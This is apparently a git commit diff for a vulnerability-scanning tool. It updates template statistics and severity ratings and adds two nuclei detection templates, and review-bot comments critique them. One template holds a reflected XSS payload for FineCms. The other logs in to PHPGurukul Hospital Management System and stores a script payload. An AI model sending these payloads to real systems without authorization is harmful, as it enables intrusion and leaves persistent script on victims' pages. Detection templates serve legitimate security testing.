
Commit abdcffd

committed
fix fingerprint; up PoCs 2022-08-30
1 parent 963841d commit abdcffd

145 files changed

Lines changed: 3777 additions & 2029 deletions


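--- a/config/config.json
+++ b/config/config.json
@@ -66,7 +66,7 @@
 "KsubdomainRegxp": "([0-9a-zA-Z\\-]+\\.[0-9a-zA-Z\\-]+)$",
 "naabu_dns": {},
 "naabu": {"TopPorts": "1000","ScanAllIPS": true,"Threads": 50,"EnableProgressBar": false},
-"priorityNmap": false,
+"priorityNmap": true,
 "noScan": false,
 "enableMultNuclei": false,
 "enableNuclei": true,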
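Review bot: Flipping `priorityNmap` to `true` changes the default scanning behaviour for everyone who uses this config, yet the commit message ("fix fingerprint; up PoCs") does not mention it. JSON cannot carry an explanatory comment, so the reason for the new default and its effect (presumably that nmap is preferred over the naabu port scan configured on the line above) should be stated in the commit description or the project's configuration documentation. If the change was only needed for local testing, `"priorityNmap": false,` should be restored. The enclosing object starts and ends outside the hunk.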

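--- a/config/nuclei-templates/README.md
+++ b/config/nuclei-templates/README.md
@@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
 
 | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
 |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
-| cve | 1363 | daffainfo | 629 | cves | 1336 | info | 1433 | http | 3740 |
-| panel | 627 | dhiyaneshdk | 551 | exposed-panels | 635 | high | 971 | file | 76 |
-| lfi | 497 | pikpikcu | 325 | vulnerabilities | 524 | medium | 804 | network | 51 |
-| xss | 467 | pdteam | 269 | technologies | 276 | critical | 462 | dns | 17 |
-| wordpress | 417 | geeknik | 187 | exposures | 272 | low | 220 | | |
-| exposure | 389 | dwisiswant0 | 169 | token-spray | 230 | unknown | 7 | | |
-| cve2021 | 340 | 0x_akoko | 158 | misconfiguration | 215 | | | | |
-| rce | 333 | princechaddha | 150 | workflows | 187 | | | | |
-| wp-plugin | 312 | pussycat0x | 133 | default-logins | 102 | | | | |
-| tech | 288 | gy741 | 126 | file | 76 | | | | |
-
-**293 directories, 4110 files**.
+| cve | 1388 | daffainfo | 630 | cves | 1363 | info | 1450 | http | 3773 |
+| panel | 642 | dhiyaneshdk | 558 | exposed-panels | 649 | high | 974 | file | 76 |
+| edb | 548 | pikpikcu | 326 | vulnerabilities | 510 | medium | 811 | network | 51 |
+| lfi | 496 | pdteam | 269 | technologies | 278 | critical | 469 | dns | 17 |
+| xss | 472 | geeknik | 187 | exposures | 273 | low | 219 | | |
+| wordpress | 415 | dwisiswant0 | 169 | token-spray | 230 | unknown | 7 | | |
+| exposure | 394 | 0x_akoko | 158 | misconfiguration | 217 | | | | |
+| cve2021 | 343 | princechaddha | 150 | workflows | 189 | | | | |
+| rce | 335 | pussycat0x | 133 | default-logins | 102 | | | | |
+| wp-plugin | 312 | ritikchaddha | 130 | file | 76 | | | | |
+
+**294 directories, 4145 files**.
 
 </td>
 </tr>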

config/nuclei-templates/TEMPLATES-STATS.json

Lines changed: 1 addition & 1 deletion
Large diffs are not rendered by default.

config/nuclei-templates/TEMPLATES-STATS.md

Lines changed: 1823 additions & 1786 deletions
Large diffs are not rendered by default.

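--- a/config/nuclei-templates/TOP-10.md
+++ b/config/nuclei-templates/TOP-10.md
@@ -1,12 +1,12 @@
 | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
 |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
-| cve | 1363 | daffainfo | 629 | cves | 1336 | info | 1433 | http | 3740 |
-| panel | 627 | dhiyaneshdk | 551 | exposed-panels | 635 | high | 971 | file | 76 |
-| lfi | 497 | pikpikcu | 325 | vulnerabilities | 524 | medium | 804 | network | 51 |
-| xss | 467 | pdteam | 269 | technologies | 276 | critical | 462 | dns | 17 |
-| wordpress | 417 | geeknik | 187 | exposures | 272 | low | 220 | | |
-| exposure | 389 | dwisiswant0 | 169 | token-spray | 230 | unknown | 7 | | |
-| cve2021 | 340 | 0x_akoko | 158 | misconfiguration | 215 | | | | |
-| rce | 333 | princechaddha | 150 | workflows | 187 | | | | |
-| wp-plugin | 312 | pussycat0x | 133 | default-logins | 102 | | | | |
-| tech | 288 | gy741 | 126 | file | 76 | | | | |
+| cve | 1388 | daffainfo | 630 | cves | 1363 | info | 1450 | http | 3773 |
+| panel | 642 | dhiyaneshdk | 558 | exposed-panels | 649 | high | 974 | file | 76 |
+| edb | 548 | pikpikcu | 326 | vulnerabilities | 510 | medium | 811 | network | 51 |
+| lfi | 496 | pdteam | 269 | technologies | 278 | critical | 469 | dns | 17 |
+| xss | 472 | geeknik | 187 | exposures | 273 | low | 219 | | |
+| wordpress | 415 | dwisiswant0 | 169 | token-spray | 230 | unknown | 7 | | |
+| exposure | 394 | 0x_akoko | 158 | misconfiguration | 217 | | | | |
+| cve2021 | 343 | princechaddha | 150 | workflows | 189 | | | | |
+| rce | 335 | pussycat0x | 133 | default-logins | 102 | | | | |
+| wp-plugin | 312 | ritikchaddha | 130 | file | 76 | | | | |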

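--- a/config/nuclei-templates/cnvd/2020/CNVD-2020-23735.yaml
+++ b/config/nuclei-templates/cnvd/2020/CNVD-2020-23735.yaml
@@ -3,7 +3,7 @@ id: CNVD-2020-23735
 info:
 name: Xxunchi CMS - Local File Inclusion
 author: princechaddha
-severity: medium
+severity: high
 description: Xunyou CMS is vulnerable to local file inclusion. Attackers can use vulnerabilities to obtain sensitive information.
 reference:
 - https://www.cnvd.org.cn/flaw/show/2025171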
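Review bot: The `name` and `description` fields of this info block disagree on the product: `name` says "Xxunchi CMS" while `description` says "Xunyou CMS". With the severity raised to `high`, findings from this template will be triaged earlier, and a misspelt product name makes them harder to match against an asset inventory or the referenced CNVD advisory. Use the advisory's spelling in both fields, for example `name: Xunyou CMS - Local File Inclusion` if the description is the correct one. The info block continues outside the hunk.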

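--- a/config/nuclei-templates/cnvd/2021/CNVD-2021-30167.yaml
+++ b/config/nuclei-templates/cnvd/2021/CNVD-2021-30167.yaml
@@ -3,7 +3,7 @@ id: CNVD-2021-30167
 info:
 name: UFIDA NC BeanShell Remote Command Execution
 author: pikpikcu
-severity: high
+severity: critical
 description: UFIDA NC BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program.
 reference:
 - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A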

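--- a/config/nuclei-templates/cves/2014/CVE-2014-8682.yaml
+++ b/config/nuclei-templates/cves/2014/CVE-2014-8682.yaml
@@ -3,7 +3,7 @@ id: CVE-2014-8682
 info:
 name: Gogs (Go Git Service) - SQL Injection
 author: dhiyaneshDK,daffainfo
-severity: high
+severity: critical
 description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.
 reference:
 - https://nvd.nist.gov/vuln/detail/CVE-2014-8682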
Lines changed: 37 additions & 0 deletions
@@ -0,0 +1,37 @@
1+
id: CVE-2017-11629
2+
3+
info:
4+
name: FineCms 5.0.10 - Cross Site Scripting
5+
author: ritikchaddha
6+
severity: medium
7+
description: |
8+
dayrui FineCms through 5.0.10 has Cross Site Scripting (XSS) in controllers/api.php via the function parameter in a c=api&m=data2 request.
9+
reference:
10+
- http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse
11+
- https://nvd.nist.gov/vuln/detail/CVE-2017-11629/
12+
classification:
13+
cve-id: CVE-2017-11629
14+
metadata:
15+
verified: true
16+
tags: cve,cve2017,xss,finecms
17+
18+
requests:
19+
- method: GET
20+
path:
21+
- "{{BaseURL}}/index.php?c=api&m=data2&function=%3Cscript%3Ealert(document.domain)%3C/script%3Ep&format=php"
22+
23+
matchers-condition: and
24+
matchers:
25+
- type: word
26+
part: body
27+
words:
28+
- '<script>alert(document.domain)</script>p不存在'
29+
30+
- type: word
31+
part: header
32+
words:
33+
- text/html
34+
35+
- type: status
36+
status:
37+
- 200
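Review bot: The `classification` block carries only `cve-id`, while the other template added in this commit (CVE-2020-5191) also records `cvss-metrics`, `cvss-score` and `cwe-id`; add the same fields here (`cwe-id: CWE-79` for XSS, with the score and vector taken from the NVD entry already referenced) so severity-based filtering and reporting treat both templates alike. `verified: true` is a boolean here but the string `"true"` in the CVE-2020-5191 template, so one form should be used in both. The first reference ends in the fragment `#URL-Redirector-Abuse`, which appears to point at a different section of that write-up than the XSS issue. The body matcher also depends on the localized error text `不存在`, so a comment noting that dependency would help whoever triages a missed detection.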
Lines changed: 55 additions & 0 deletions
@@ -0,0 +1,55 @@
1+
id: CVE-2020-5191
2+
3+
info:
4+
name: Hospital Management System 4.0 - Cross-Site Scripting
5+
author: TenBird
6+
severity: medium
7+
description: |
8+
PHPGurukul Hospital Management System in PHP v4.0 suffers from multiple Persistent XSS vulnerabilities.
9+
reference:
10+
- https://www.exploit-db.com/exploits/47841
11+
- https://nvd.nist.gov/vuln/detail/CVE-2020-5191
12+
- https://phpgurukul.com/hospital-management-system-in-php/
13+
classification:
14+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
15+
cvss-score: 6.1
16+
cve-id: CVE-2020-5191
17+
cwe-id: CWE-79
18+
metadata:
19+
verified: "true"
20+
tags: cve2020,hms,cms,xss,authenticated,edb,cve
21+
22+
requests:
23+
- raw:
24+
- |
25+
POST /hospital/hms/admin/index.php HTTP/1.1
26+
Host: {{Hostname}}
27+
Content-Type: application/x-www-form-urlencoded
28+
29+
username={{username}}&password={{password}}&submit=&submit=
30+
31+
- |
32+
POST /hospital/hms/admin/doctor-specilization.php HTTP/1.1
33+
Host: {{Hostname}}
34+
Content-Type: application/x-www-form-urlencoded
35+
36+
doctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3Ctd%3E&submit=
37+
38+
redirects: true
39+
max-redirects: 2
40+
cookie-reuse: true
41+
matchers-condition: and
42+
matchers:
43+
- type: word
44+
part: body
45+
words:
46+
- '<td class="hidden-xs"></td><script>alert(document.domain);</script><td>'
47+
48+
- type: word
49+
part: header
50+
words:
51+
- text/html
52+
53+
- type: status
54+
status:
55+
- 200
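Review bot: The second request stores a `<script>` value in the application's doctor-specialization list and nothing removes it afterwards, so every scan leaves persistent script content in the target's admin pages; the template should say so in `description` and carry the `intrusive` tag (`tags: cve2020,hms,cms,xss,authenticated,edb,cve,intrusive`) so operators can exclude it from routine scans of production systems. Because the stored value is a fixed string, the body matcher will also fire on an entry left by an earlier run or by another tester; including `{{randstr}}` in the submitted value and in the matcher word would tie a hit to this run's write. The classification vector has `PR:N` although the template is tagged `authenticated` and logs in to the admin panel first, which deserves a comment so the 6.1 score is not read as describing an unauthenticated check. Both raw requests hard-code the `/hospital/hms/` prefix, so an install under another path will be reported clean.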
